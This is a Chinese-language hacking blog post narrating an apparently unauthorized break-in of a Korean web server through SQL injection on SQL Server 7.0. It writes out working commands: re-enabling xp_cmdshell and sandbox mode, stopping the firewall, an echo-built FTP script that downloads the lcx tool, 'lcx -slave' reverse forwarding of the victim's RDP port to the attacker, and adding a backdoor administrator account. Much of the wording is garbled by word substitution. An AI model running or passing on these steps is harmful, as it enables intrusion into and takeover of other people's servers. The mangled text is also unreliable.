下午搞了一個(gè)站，存在sa注入點(diǎn)裂痕，，window 2000+iis5。

通過(guò)注入點(diǎn)信息，發(fā)明sqlserver版本為7.00，以前見(jiàn)過(guò)一次這個(gè)版本，不外沒(méi)有怎么深入研究，伴侶掃弱口令掃描到的，其時(shí)也提權(quán)了，詳細(xì)健忘怎么提的了。附圖。

。

掃描這個(gè)ip地點(diǎn)發(fā)明只對(duì)外開(kāi)放了53跟80，韓國(guó)的鳥(niǎo)站，由此揣摩大概為內(nèi)網(wǎng)可能外網(wǎng)可是限制了對(duì)外開(kāi)放的端口。一般環(huán)境下會(huì)開(kāi)啟1433，跟3389的可是限制對(duì)外毗連。

sqlserver7.0的固然以前搞過(guò)，可是健忘詳細(xì)怎么弄了，于是一步一步的先用穿山甲自帶的成果規(guī)復(fù)xp_cmdshell,sp_oa**,sp_***job,尚有一個(gè)sandboxmode沙盒模式。都開(kāi)啟之后，隨便執(zhí)行set，ipconfig等呼吁發(fā)明沒(méi)有回顯，也不知道哪個(gè)組件可以呼吁。于是想到一個(gè)步伐。

此刻我本機(jī)執(zhí)行l(wèi)cx -listen 77 88通過(guò)77端口監(jiān)聽(tīng)外部來(lái)的數(shù)據(jù)。然后在穿山甲里執(zhí)行net stop sharedaccess通過(guò)xp_cmdshell,然后sp_oa**,sp_***job,沙盒模式一一執(zhí)行，固然不知道樂(lè)成沒(méi)，可是假如可以執(zhí)行呼吁，必定可以樂(lè)成，目標(biāo)是為了是對(duì)方呆板能對(duì)外發(fā)送數(shù)據(jù)。接著跟適才一樣執(zhí)行telnet 我的ip 22端口，最終發(fā)明通過(guò)沙盒模式可以執(zhí)行呼吁。

可是對(duì)方的3389不答允毗連，這時(shí)候想通過(guò)lcx端口轉(zhuǎn)發(fā)來(lái)毗連對(duì)方的3389，固然不確定是3389可是碰碰命運(yùn)。

個(gè)中的ftp傳文件下載文件我親自測(cè)試過(guò)，就用這個(gè)了。

echo open www.ftp.com>ftp.TXT //毗連FTP
echo username>>ftp.TXT       //輸入用戶名
echo password>>ftp.TXT       //輸入暗碼
echo get lcx c:lcx.exe>>ftp.TXT //執(zhí)行下載呼吁
echo bye>>ftp.TXT             //退出
ftp -s:ftp.txt                //執(zhí)行FTP.TXT文件中的FTP呼吁
在穿山甲里依次執(zhí)行以下語(yǔ)句，假如沒(méi)有非凡環(huán)境。lcx就下載到對(duì)方呆板c盤(pán)目次下了。

然后通過(guò)沙河模式執(zhí)行c:/lcx.exe -slave 我的ip 77 127.0.0.1 3389

本機(jī)執(zhí)行l(wèi)cx -listen 77 88。

過(guò)了一小會(huì)發(fā)明有數(shù)據(jù)返回，證明lcx已經(jīng)傳上去了，而且將對(duì)方3389端口轉(zhuǎn)發(fā)到本機(jī)上了。

本機(jī)再毗連127.0.0.1:88，可以毗連上終端，然后在穿山甲執(zhí)行添加用戶的呼吁net user user password /add

net localgroup administrators user /add毗連終端，樂(lè)成登岸。如圖。

中間碰著一些問(wèn)題就不說(shuō)了。有什么疑問(wèn)的可以提出來(lái)。